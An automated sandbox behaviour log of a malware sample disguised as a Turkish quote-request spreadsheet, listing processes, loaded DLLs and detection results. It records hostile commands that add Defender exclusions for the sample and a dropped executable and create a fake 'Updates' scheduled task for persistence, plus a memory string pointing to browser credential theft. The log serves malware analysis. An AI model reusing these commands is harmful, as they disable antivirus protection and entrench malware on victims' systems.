Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4300:120:WilError_03
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Mutant created: \Sessions\1\BaseNamedObjects\FDGYsLKdk
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File created: C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp Jump to behavior
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003191000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000315D000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000319D000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000316C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000314D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003278000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000032AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe Section loaded: dwrite.dll Jump to behavior
